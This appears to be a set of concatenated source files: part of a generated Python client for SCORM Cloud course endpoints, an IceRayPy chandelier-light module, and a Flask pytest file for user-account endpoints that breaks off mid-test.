:param BatchTagsSchema batch: Array of ids, and array of tags for bulk tag operations (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_course_tags_batch_with_http_info(batch, **kwargs) # noqa: E501
else:
(data) = self.put_course_tags_batch_with_http_info(batch, **kwargs) # noqa: E501
return data
def put_course_tags_batch_with_http_info(self, batch, **kwargs): # noqa: E501
"""Add a group of tags to a group of Courses # noqa: E501
Applies all of the provided tags on all of the provided courses. Tags are used to easily identify resources. Adding tags can enable more refined searches when making calls to certain endpoints (e.g. GetCourses). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_course_tags_batch_with_http_info(batch, async_req=True)
>>> result = thread.get()
:param async_req bool
:param BatchTagsSchema batch: Array of ids, and array of tags for bulk tag operations (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['batch'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_course_tags_batch" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'batch' is set
if ('batch' not in params or
params['batch'] is None):
raise ValueError("Missing the required parameter `batch` when calling `put_course_tags_batch`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'batch' in params:
body_params = params['batch']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/tags', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
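# Example (sketch): applying the same tags to several courses in one call.
# The client variable `api` and the batch contents are illustrative; per the
# docstring above, the schema carries an array of ids and an array of tags.
#
#   batch = BatchTagsSchema()  # set its course ids and tags per the schema docs
#   api.put_course_tags_batch(batch)  # synchronous; returns None on success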
def set_course_configuration(self, course_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course # noqa: E501
Updates configuration settings at the course level. This will explicitly set a value at the course level and override any settings from a higher level. These settings will affect all items within the course which do not have their own explicit configuration set. This can effectively be used to set course level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_configuration(course_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_course_configuration_with_http_info(course_id, configuration_settings, **kwargs) # noqa: E501
else:
(data) = self.set_course_configuration_with_http_info(course_id, configuration_settings, **kwargs) # noqa: E501
return data
def set_course_configuration_with_http_info(self, course_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course # noqa: E501
Updates configuration settings at the course level. This will explicitly set a value at the course level and override any settings from a higher level. These settings will affect all items within the course which do not have their own explicit configuration set. This can effectively be used to set course level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_configuration_with_http_info(course_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'configuration_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_course_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `set_course_configuration`") # noqa: E501
# verify the required parameter 'configuration_settings' is set
if ('configuration_settings' not in params or
params['configuration_settings'] is None):
raise ValueError("Missing the required parameter `configuration_settings` when calling `set_course_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration_settings' in params:
body_params = params['configuration_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/configuration', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_course_title(self, course_id, title, **kwargs): # noqa: E501
"""Update title for a Course # noqa: E501
Updates the title of the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_title(course_id, title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TitleSchema title: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_course_title_with_http_info(course_id, title, **kwargs) # noqa: E501
else:
(data) = self.set_course_title_with_http_info(course_id, title, **kwargs) # noqa: E501
return data
def set_course_title_with_http_info(self, course_id, title, **kwargs): # noqa: E501
"""Update title for a Course # noqa: E501
Updates the title of the course. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_title_with_http_info(course_id, title, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param TitleSchema title: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'title'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_course_title" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `set_course_title`") # noqa: E501
# verify the required parameter 'title' is set
if ('title' not in params or
params['title'] is None):
raise ValueError("Missing the required parameter `title` when calling `set_course_title`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'title' in params:
body_params = params['title']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/title', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_course_version_configuration(self, course_id, version_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course Version # noqa: E501
Updates configuration settings at the course version level. This will explicitly set a value at the course version level and override any settings from a higher level. These settings will affect all items within the course version which do not have their own explicit configuration set. This can effectively be used to set course version level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_version_configuration(course_id, version_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_course_version_configuration_with_http_info(course_id, version_id, configuration_settings, **kwargs) # noqa: E501
else:
(data) = self.set_course_version_configuration_with_http_info(course_id, version_id, configuration_settings, **kwargs) # noqa: E501
return data
def set_course_version_configuration_with_http_info(self, course_id, version_id, configuration_settings, **kwargs): # noqa: E501
"""Update configuration settings for a Course Version # noqa: E501
Updates configuration settings at the course version level. This will explicitly set a value at the course version level and override any settings from a higher level. These settings will affect all items within the course version which do not have their own explicit configuration set. This can effectively be used to set course version level defaults. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_course_version_configuration_with_http_info(course_id, version_id, configuration_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param int version_id: (required)
:param SettingsPostSchema configuration_settings: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['course_id', 'version_id', 'configuration_settings'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_course_version_configuration" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'course_id' is set
if ('course_id' not in params or
params['course_id'] is None):
raise ValueError("Missing the required parameter `course_id` when calling `set_course_version_configuration`") # noqa: E501
# verify the required parameter 'version_id' is set
if ('version_id' not in params or
params['version_id'] is None):
raise ValueError("Missing the required parameter `version_id` when calling `set_course_version_configuration`") # noqa: E501
# verify the required parameter 'configuration_settings' is set
if ('configuration_settings' not in params or
params['configuration_settings'] is None):
raise ValueError("Missing the required parameter `configuration_settings` when calling `set_course_version_configuration`") # noqa: E501
collection_formats = {}
path_params = {}
if 'course_id' in params:
path_params['courseId'] = params['course_id'] # noqa: E501
if 'version_id' in params:
path_params['versionId'] = params['version_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'configuration_settings' in params:
body_params = params['configuration_settings']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APP_NORMAL', 'OAUTH'] # noqa: E501
return self.api_client.call_api(
'/courses/{courseId}/versions/{versionId}/configuration', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def upload_course_asset_file(self, course_id, destination, **kwargs): # noqa: E501
"""Upload an asset file for a Course # noqa: E501
Creates or updates an asset file uploaded from your file system into the course. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.upload_course_asset_file(course_id, destination, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str course_id: (required)
:param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
:param file file: The asset file to import into the course.
:param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
:return: AssetFileSchema
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.upload_course_asset_file_with_http_info(course_id, destination, **kwargs) # noqa: E501
else:
(data) = self.upload_course_asset_file_with_http_info(course_id, destination, **kwargs) # noqa: E501
return data
def upload_course_asset_file_with_http_info(self, course_id, destination, **kwargs): # noqa: E501
"""Upload an asset file for a Course # noqa: E501
        Creates or updates an asset file uploaded from your file system into the course. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.upload_course_asset_file_with_http_info(course_id, destination, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
        :param file file: The asset file to import into the course.
        :param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
        :return: AssetFileSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['course_id', 'destination', 'file', 'update_asset_policy']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method upload_course_asset_file" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `upload_course_asset_file`")  # noqa: E501
        # verify the required parameter 'destination' is set
        if ('destination' not in params or
                params['destination'] is None):
            raise ValueError("Missing the required parameter `destination` when calling `upload_course_asset_file`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id']  # noqa: E501

        query_params = []
        if 'update_asset_policy' in params:
            query_params.append(('updateAssetPolicy', params['update_asset_policy']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}
        if 'file' in params:
            local_var_files['file'] = params['file']  # noqa: E501
        if 'destination' in params:
            form_params.append(('destination', params['destination']))  # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['multipart/form-data'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH']  # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/asset/upload', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AssetFileSchema',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
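The pre-flight checks in the method above follow a standard swagger-codegen pattern: collect `locals()`, reject unknown keyword arguments, then verify each required parameter is set. A minimal standalone sketch of that pattern, independent of the SCORM Cloud client (the function and parameter names here are illustrative, not part of the generated API):

```python
def validate_call_params(required, optional, **kwargs):
    """Reject unknown keyword arguments and missing required parameters,
    mirroring the generated client's pre-flight checks (sketch only)."""
    all_params = set(required) | set(optional)
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'" % key)
    for key in required:
        if kwargs.get(key) is None:
            raise ValueError(
                "Missing the required parameter `%s`" % key)
    return kwargs


# Unknown kwargs raise TypeError; missing required values raise ValueError.
params = validate_call_params(
    ['course_id', 'destination'], ['file', 'update_asset_policy'],
    course_id='c1', destination='/Etiquette/Course.html')
```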
    def upload_course_version_asset_file(self, course_id, version_id, destination, **kwargs):  # noqa: E501
        """Upload an asset file for Course Version  # noqa: E501

        Creates or updates an asset file uploaded from your file system into the course version. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.upload_course_version_asset_file(course_id, version_id, destination, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
        :param file file: The asset file to import into the course.
        :param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
        :return: AssetFileSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.upload_course_version_asset_file_with_http_info(course_id, version_id, destination, **kwargs)  # noqa: E501
        else:
            (data) = self.upload_course_version_asset_file_with_http_info(course_id, version_id, destination, **kwargs)  # noqa: E501
            return data
    def upload_course_version_asset_file_with_http_info(self, course_id, version_id, destination, **kwargs):  # noqa: E501
        """Upload an asset file for Course Version  # noqa: E501

        Creates or updates an asset file uploaded from your file system into the course version. The file will be sent as part of the request and will be stored in SCORM Cloud alongside the course. This is a useful way to modify the course structure without needing to reimport the whole course after you've made changes. >**Info:** >If the course structure is being heavily modified, consider creating a new version instead. This can be done by calling one of the course import jobs while passing true for `mayCreateNewVersion`.  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.upload_course_version_asset_file_with_http_info(course_id, version_id, destination, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param str destination: Relative path from the course's base directory where the asset file will be uploaded. `/Etiquette/Course.html` will upload the file into the Etiquette folder of the course. (required)
        :param file file: The asset file to import into the course.
        :param str update_asset_policy: Describes how SCORM Cloud should handle importing asset files with respect to overwriting files. Valid values are 'reject', 'strict', and 'lax'. A 'reject' policy request will fail if the asset file already exists on the system ('overwriting' not allowed). A 'strict' policy request will fail if the asset file does not already exist ('overwriting' is required). A 'lax' policy request will not consider whether the file already exists (i.e., it will attempt to import in all cases).
        :return: AssetFileSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['course_id', 'version_id', 'destination', 'file', 'update_asset_policy']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method upload_course_version_asset_file" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `upload_course_version_asset_file`")  # noqa: E501
        # verify the required parameter 'version_id' is set
        if ('version_id' not in params or
                params['version_id'] is None):
            raise ValueError("Missing the required parameter `version_id` when calling `upload_course_version_asset_file`")  # noqa: E501
        # verify the required parameter 'destination' is set
        if ('destination' not in params or
                params['destination'] is None):
            raise ValueError("Missing the required parameter `destination` when calling `upload_course_version_asset_file`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id']  # noqa: E501
        if 'version_id' in params:
            path_params['versionId'] = params['version_id']  # noqa: E501

        query_params = []
        if 'update_asset_policy' in params:
            query_params.append(('updateAssetPolicy', params['update_asset_policy']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}
        if 'file' in params:
            local_var_files['file'] = params['file']  # noqa: E501
        if 'destination' in params:
            form_params.append(('destination', params['destination']))  # noqa: E501

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['multipart/form-data'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH']  # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/versions/{versionId}/asset/upload', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='AssetFileSchema',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
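The `update_asset_policy` docstring above describes three server-side overwrite rules: 'reject' (fail if the file exists), 'strict' (fail if it does not), and 'lax' (always attempt the import). A local sketch of that decision rule, for illustration only (this is not client or server code from the SCORM Cloud SDK):

```python
def check_update_policy(policy, file_exists):
    """Decide whether an asset upload may proceed, following the
    reject/strict/lax semantics described in the docstring above."""
    if policy == 'reject':   # overwriting not allowed
        return not file_exists
    if policy == 'strict':   # overwriting is required
        return file_exists
    if policy == 'lax':      # always attempt the import
        return True
    raise ValueError("unknown updateAssetPolicy: %r" % policy)
```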
# File: src/IceRayPy/utility/light/chandelier.py
# Repo: dmilos/IceRay (license: MIT-0)
import ctypes

import IceRayPy

Pointer = ctypes.POINTER
AddresOf = ctypes.addressof

Coord3D = IceRayPy.type.math.coord.Scalar3D
Color = IceRayPy.type.color.RGB


class Hexa:
    def __init__(self, P_dll):
        center = Coord3D(0, 0, -2)
        radius = 2
        c0 = 0.0 * 0.8
        c1 = 1.4 * 0.8
        c2 = 1.6 * 0.8
        # Per-direction colour triples (inner, middle, outer intensity)
        color0 = {"-X": Color(c0, c0, c0), "+X": Color(c0, c0, c0), "-Y": Color(c0, c0, c0), "+Y": Color(c0, c0, c0), "+Z": Color(c0, c0, c0), "-Z": Color(c0, c0, c0)}
        color1 = {"-X": Color(c1, c1, c1), "+X": Color(c1, c1, c1), "-Y": Color(c1, c1, c1), "+Y": Color(c1, c1, c1), "+Z": Color(c1, c1, c1), "-Z": Color(c1, c1, c1)}
        color2 = {"-X": Color(c2, c2, c2), "+X": Color(c2, c2, c2), "-Y": Color(c2, c2, c2), "+Y": Color(c2, c2, c2), "+Z": Color(c2, c2, c2), "-Z": Color(c2, c2, c2)}

        self.m_implementation = IceRayPy.core.light.Chandelier(P_dll)
        self.m_cargo = self.m_implementation.m_cargo

        # Push one point light per axis direction; note no '-Z' spot is pushed.
        spot = IceRayPy.core.light.Spot(Coord3D(radius + center[0], 0, 0), color0['+X'], color1['+X'], color2['+X'])
        self.m_implementation.push(IceRayPy.core.light.Point(P_dll, spot))

        spot = IceRayPy.core.light.Spot(Coord3D(-radius + center[0], 0, 0), color0['-X'], color1['-X'], color2['-X'])
        self.m_implementation.push(IceRayPy.core.light.Point(P_dll, spot))

        spot = IceRayPy.core.light.Spot(Coord3D(0, radius + center[1], 0), color0['+Y'], color1['+Y'], color2['+Y'])
        self.m_implementation.push(IceRayPy.core.light.Point(P_dll, spot))

        spot = IceRayPy.core.light.Spot(Coord3D(0, -radius + center[1], 0), color0['-Y'], color1['-Y'], color2['-Y'])
        self.m_implementation.push(IceRayPy.core.light.Point(P_dll, spot))

        spot = IceRayPy.core.light.Spot(Coord3D(0, 0, radius + center[2]), color0['+Z'], color1['+Z'], color2['+Z'])
        self.m_implementation.push(IceRayPy.core.light.Point(P_dll, spot))

    def __del__(self):
        pass  # Do nothing


class Octa:
    def __init__(self, P_dll):
        self.m_implementation = IceRayPy.core.light.Chandelier(P_dll)
        self.m_cargo = self.m_implementation.m_cargo

    def __del__(self):
        pass  # Do nothing


class Tetra:
    def __init__(self, P_dll):
        self.m_implementation = IceRayPy.core.light.Chandelier(P_dll)
        self.m_cargo = self.m_implementation.m_cargo

    def __del__(self):
        pass  # Do nothing
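The `Hexa` constructor above places point lights at axis-aligned offsets of `radius` around `center`. The geometry it generates can be sketched with plain tuples (this is an illustration of the positions only; IceRayPy's `Coord3D` is not used here):

```python
def hexa_spot_positions(center, radius):
    """Axis-aligned light positions as pushed by Hexa.__init__:
    +X, -X, +Y, -Y and +Z offsets from the chandelier centre.
    (The original constructor pushes no '-Z' spot.)"""
    cx, cy, cz = center
    return [
        (cx + radius, 0, 0),   # '+X'
        (cx - radius, 0, 0),   # '-X'
        (0, cy + radius, 0),   # '+Y'
        (0, cy - radius, 0),   # '-Y'
        (0, 0, cz + radius),   # '+Z'
    ]
```

With the constructor's defaults, `hexa_spot_positions((0, 0, -2), 2)` puts the '+Z' light at the origin.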
# File: test/app/controllers/test_user_controller.py
# Repo: dmaiabjj/luiza-lab-api-challenger (license: MIT)
from app.domain.user.user import User, UserRole, RoleCategory
from test import build_header, DATE_FORMAT
from test.conftest import set_up
def test_add_user(client, db):
    set_up(db)

    response = client.post('/api/auth/user/token', json=dict(
        email="luke@luizalabs.com.br",
        password="darthVaderIsMyFather"
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']
    headers = build_header(access_token)

    name = "Anakin Skywalker"
    email = "anakin@luizalabs.com.br"
    password = "iAmDarthVader"

    response = client.post('/api/user', json=dict(
        name=name,
        email=email,
        password=password
    ), headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert response.json['id']
    assert response.json['name'] == name
    assert response.json['email'] == email
    assert response.json['created_date']

    user = db.session.query(User).filter_by(id=response.json['id']).one_or_none()

    assert user
    assert user.id == response.json['id']
    assert user.name == response.json['name']
    assert user.email == response.json['email']
    assert user.created_date.strftime(DATE_FORMAT) == response.json['created_date']
    assert user.verify_password(password)
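`build_header` is imported from the test package's `__init__`, whose implementation is not shown in this excerpt. A typical JWT test helper of that shape would simply wrap the token in a Bearer header; the following is an assumed sketch, not the repo's code:

```python
def build_header(access_token):
    """Attach the JWT as a Bearer token for authenticated test requests
    (hypothetical sketch of the helper imported above)."""
    return {'Authorization': 'Bearer {}'.format(access_token)}
```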
def test_update_user(client, db):
    set_up(db)

    password = "iAmDarthVader"
    user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
                password=generate_password_hash(password),
                roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    db.session.add(user)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email=user.email,
        password=password
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    name = "Darth Vader"
    email = "darthvader@starwars.com"

    headers = build_header(access_token)
    response = client.put('/api/user', json=dict(
        name=name,
        email=email
    ), headers=headers, follow_redirects=True)

    assert response.status_code == 200
    assert response.json['id']
    assert response.json['name'] == name
    assert response.json['email'] == email
    assert response.json['created_date']
    assert response.json['updated_date']

    user_db = db.session.query(User).filter_by(id=response.json['id']).one_or_none()

    assert user_db
    assert user_db.id == response.json['id']
    assert user_db.name == response.json['name']
    assert user_db.email == response.json['email']
    assert user_db.created_date.strftime(DATE_FORMAT) == response.json['created_date']
    assert user_db.updated_date.strftime(DATE_FORMAT) == response.json['updated_date']
    assert user_db.verify_password(password)
def test_delete_user(client, db):
    set_up(db)

    password = "iAmDarthVader"
    user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
                password=generate_password_hash(password),
                roles=[UserRole(category=RoleCategory.SUPER_USER), UserRole(category=RoleCategory.ADMIN)])
    db.session.add(user)
    db.session.commit()

    response = client.post('/api/auth/user/token', json=dict(
        email=user.email,
        password=password
    ), follow_redirects=True)

    assert response.status_code == 200
    assert response.json['access_token'] is not None

    access_token = response.json['access_token']

    headers = build_header(access_token)
    response = client.delete('/api/user', headers=headers, follow_redirects=True)

    assert response.status_code == 200

    user_db = db.session.query(User).filter_by(id=user.id).one_or_none()

    assert user_db
    assert user_db.id == user.id
    assert user_db.name == user.name
    assert user_db.email == user.email
    assert user_db.verify_password(password)
    assert user_db.created_date.strftime(DATE_FORMAT) == user.created_date.strftime(DATE_FORMAT)
    assert user_db.updated_date.strftime(DATE_FORMAT) == user.updated_date.strftime(DATE_FORMAT)
    assert user_db.deleted_date
def test_change_customer_password(client, db):
    set_up(db)

    password = "iAmDarthVader"
    user = User(name="Anakin Skywalker", email="anakin@luizalabs.com.br",
